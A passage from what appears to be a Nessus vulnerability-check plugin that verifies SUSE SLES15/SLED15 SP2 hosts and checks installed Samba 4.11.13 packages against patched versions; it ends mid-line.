audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-ceph-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-binding0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-samr-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-samr0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc-samr0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libdcerpc0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-krb5pac-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-krb5pac0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-nbt-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-nbt0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-standard-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-standard0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr-standard0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libndr0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libnetapi-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libnetapi0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libnetapi0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-credentials-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-credentials0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-errors-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-errors0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-hostconfig-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-hostconfig0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-passdb-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-passdb0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-policy-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-policy-python3-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-policy0-python3-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-policy0-python3-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-util-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-util0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamba-util0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamdb-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamdb0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsamdb0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbclient-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbclient0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbconf-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbconf0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbconf0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbldap-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbldap2-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libsmbldap2-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libtevent-util-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libtevent-util0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libtevent-util0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libwbclient-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libwbclient0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libwbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-ad-dc-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-ad-dc-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-client-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-client-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-core-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-debugsource-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-dsdb-modules-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-dsdb-modules-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-libs-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-libs-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-libs-python3-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-libs-python3-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-python3-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-python3-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-winbind-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"samba-winbind-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-ceph-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-binding0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-samr-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-samr0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc-samr0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libdcerpc0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-krb5pac-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-krb5pac0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-nbt-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-nbt0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-standard-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr-standard0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", 